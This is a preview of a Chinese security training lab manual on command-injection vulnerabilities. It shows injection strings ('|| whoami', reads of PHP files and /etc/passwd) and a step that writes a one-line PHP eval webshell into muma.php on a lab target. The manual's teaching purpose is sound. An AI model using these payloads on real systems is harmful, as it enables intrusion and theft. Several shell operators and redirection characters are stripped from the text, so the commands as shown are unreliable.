- 1、本文档共21页,可阅读全部内容。
- 2、原创力文档(book118)网站文档一经付费(服务费),不意味着购买了该文档的版权,仅供个人/单位学习、研究之用,不得用于商业用途,未经授权,严禁复制、发行、汇编、翻译或者网络传播等,侵权必究。
- 3、本站所有内容均由合作方或网友上传,本站不对文档的完整性、权威性及其观点立场正确性做任何保证或承诺!文档内容仅供研究参考,付费前请自行鉴别。如您付费,意味着您自己接受本站规则且自行承担风险,本站不退款、不进行额外附加服务;查看《如何避免下载的几个坑》。如果您已付费下载过本站文档,您可以点击 这里二次下载。
- 4、如文档侵犯商业秘密、侵犯著作权、侵犯人身权等,请点击“版权申诉”(推荐),也可以打举报电话:400-050-0827(电话支持时间:9:00-18:30)。
查看更多
信息安全技术与应用实训指导手册(高学勤)
寻真求是 格物致知
信息安全发展态势与知识拓展
实训项目指导手册
V1.0
PAGE
PAGE 4 / NUMPAGES 72
目录TOC \o 1-2 \h \u
23710 命令执行漏洞分析及利用 2
7553 概述 2
10527 实验环境 2
21218 前提条件 2
2424 实验流程 2
15621 实验目标 2
928 任务1 利用命令执行漏洞获取系统敏感信息 3
5759 任务2 利用漏洞获取网站控制权限 10
19073 任务3 命令执行漏洞防护 13
命令执行漏洞分析及利用
概述
当应用需要调用一些外部程序去处理内容的情况下,就会用到一些执行系统命令的函数。如PHP中的system(),exec(),shell_exec()等,当用户可以控制命令执行函数中的参数时,将可注入恶意系统命令到正常命令中,造成命令执行攻击。
本实验使用的靶场环境为:命令执行渗透靶场。
实验环境
攻击机:Windows Server 2016(01-Windows攻击机),IP:30
靶机:CentOS 64位(02-Linux靶机),IP:72
前提条件
本实验要求:
熟悉Windows基本操作
熟悉Linux常用命令
实验流程
实验目标
完成本实验后,您将能够:
掌握命令执行漏洞基本利用方法
掌握利用命令执行漏洞获取Webshell的方法
掌握命令执行漏洞的代码级防护方法
任务1 利用命令执行漏洞获取系统敏感信息
【任务目标】
构造命令执行语句,触发命令执行漏洞,并通过命令执行漏洞获取系统敏感信息。
【前提准备】
命令连接符:
command1 command2 :不管command1执行成功与否,都会执行command2(将上一个命令的输出作为下一个命令的输入);
command1 command2 :先执行command1执行成功后才会执行command2;
command1 | command2 :只执行command2;
command1 || command2 :command1执行失败,再执行command2(若command1执行成功,就不再执行command2);
command 1 ; command2:只在Linux里适用,command1和command2独立执行,不管command1执行成功没有,command2继续执行。
【任务步骤】
靶场环境准备
启动靶机,并查看靶机IP。(系统登录账号密码:root/root)
执行如下命令,查看靶场是否正常启动。(默认开机自动启动)
docker ps //查看当前容器是否正常运行
攻击机访问靶机站点
在攻击机打开浏览器访问http://靶机IP:85/start/
执行攻击测试
构造拼接语句: || whoami //该命令含义为:执行ping ,若ping执行失败,则执行whoami。
页面回显当前用户名称:nginx,说明whoami命令成功执行。
判断操作系统类型
通过查看IP的命令判断操作系统类型(Windows为:ipconfig,Linux为:ifconfig)。
构造拼接语句: || ipconfig
页面无回显,说明ipconfig执行失败。
构造拼接语句: || ifconfig
页面有回显,说明ifconfig执行成功,判断为Linux操作系统。
注:判断是否为Linux操作系统,有很多方法,根据Linux操作系统特性进行判断即可。
获取操作系统敏感信息
构造拼接语句: || pwd //查看网站路径
构造拼接语句: || ls //查看当前路径下的文件
构造拼接语句: || ls -l //查看文件权限
构造拼接语句: || cat lookme.php //查看指定文件内容
可以看到,命令执行成功,但因为是PHP文件内容,所以内容被解析,无法正常显示。可构造如下命令,将lookme.php中的内容保存至1.txt中。
构造拼接语句: || cat lookme.php 1.txt
查看1.txt文件是否生成。
在URL中访问1.txt文件内容。
通过上述方法,可查看各类文件内容。
同时,也可查看其它目录下的文件及内容,如:
构造拼接语句: || ls ../ //查看上一级目录
查看/etc/passwd文件内容。
任务2 利用漏洞获取网站控制权限
【任务目标】
通过命令执行漏洞,写入一句话木马到网站中,从而获得Webshell。
【任务步骤】
构造如下拼接语句:
|| echo ?php @eval($_POST[pass]);? muma.php
查看是否成功写入。
访问muma.php文件。
复制muma.p
您可能关注的文档
- 信息安全技术与应用 实训指导手册 (高学勤) 实训项目1:Web安全应用分析之SQL注入及防护配置.docx
- 信息安全技术与应用 实训指导手册 (高学勤) 实训项目2:XSS跨站脚本点击劫持分析及防护.docx
- 信息安全技术与应用 实训指导手册 (高学勤) 实训项目3:文件上传漏洞防护绕过分析及利用.docx
- 信息安全技术与应用 实训指导手册 (高学勤)实训项目4:文件包含漏洞分析及利用.docx
- 信息安全技术与应用 实训指导手册 (高学勤) 实训项目6:SafeDog实现Web安全应用防护.docx
- 信息安全技术与应用 实训指导手册 (高学勤) 实训项目7:Windows远程代码执行漏洞检测与修复.docx
- 信息安全技术与应用 实训指导手册 (高学勤) 实训项目8:防火墙规则配置实现流量过滤.docx
- 信息安全技术与应用 实训指导手册 (高学勤) 实训项目9:漏洞扫描软件配置使用.docx
- 信息安全技术与应用 实训指导手册 (高学勤) 实训项目10:配置开源WAF实现攻击防护.docx
- 信息安全技术与应用(高学勤)课后习题与答案01 第一章 信息安全的形式与发展.docx
文档评论(0)